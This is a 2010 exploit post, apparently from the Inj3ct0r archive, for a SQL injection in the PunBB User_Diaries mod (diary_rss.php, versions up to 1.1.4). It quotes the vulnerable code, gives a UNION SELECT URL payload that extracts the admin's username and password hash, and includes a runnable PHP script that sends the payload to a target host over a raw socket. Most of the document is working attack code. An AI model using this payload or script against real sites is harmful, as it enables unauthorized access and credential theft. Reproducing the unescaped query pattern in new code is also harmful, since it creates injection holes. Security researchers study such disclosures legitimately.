PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injec
Posted on 30 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit ===================================================================== #!/usr/bin/php <?PHP error_reporting(E_STRICT ^ E_WARNING); /* --------------------------------------------------------------------- PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit --------------------------------------------------------------------- download: http://www.punres.org/files.php?pid=467 by staker[at]hotmail[dot]it --------------------------------------------------------------------- [*] http://[example]/diary_rss.php?id=0+UNION+SELECT+1,CONCAT_WS(0x3a,username,password),3,4,5,6,7,8,9+FROM+foo_users+WHERE+id=2# [EXPLANATION / NOTE: IT WORKS REGARDLESS OF PHP.INI SETTINGS] ------------------------------------------------------------- {1} $user_id become $_GET['id'] variable. {2} $user_id become $where variable. {3} mysql query -> users AS r ON u.poster_id=r.id".$where." there's no escape & quotes. ------------------------------------------------------------- [file: diary_rss.php | line: 69-83] if (!empty($_GET["id"])) { $user_id = $_GET["id"]; <---- {1} $where = " WHERE u.poster_id = ".$user_id; <---- {2} } else { $user_id = ''; $where = ''; } $result = $db->query(" SELECT u.id, r.username, u.poster, u.poster_id, u.poster_ip, u.message, u.posted, u.entry_date, u.image_ext FROM ".$db->prefix."diary as u LEFT JOIN ".$db->prefix."users AS r ON u.poster_id=r.id".$where." ORDER BY u.posted DESC LIMIT 0,20 <------- {3} ") or error('Unable to fetch diary entries', __FILE__, __LINE__, $db->error()); *********************************************************************************/ echo(' --------------------------------------------------------------------- PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit ---------------------------------------------------------------------- by staker[at]hotmail[dot]it '); $host = $argv[1]; $path = $argv[2]; $pre = "punbb_"; // default table_prefix. $uid = 2; // default id (admin) $sql = '0+UNION+SELECT+1,CONCAT_WS(0x3a,username,password),3,4,5,6,7'. ",8,9+FROM+{$pre}users+WHERE+id={$uid}%23"; if ($argc != 3) { die ("Usage: php diary.php localhost /punbb/ "); } $packet = "GET {$path}/diary_rss.php?id={$sql} HTTP/1.1 ". "Host: {$host} ". "User-Agent: Lynx (textmode) ". "Connection: close "; if (preg_match('/<title>(.+?)</title>/',data_send($target,$packet),$content)) { $array = explode("'",$content[0]); print "Result: $array[1] "; } else { echo "Exploit failed "; } function data_send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused,try again! "); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
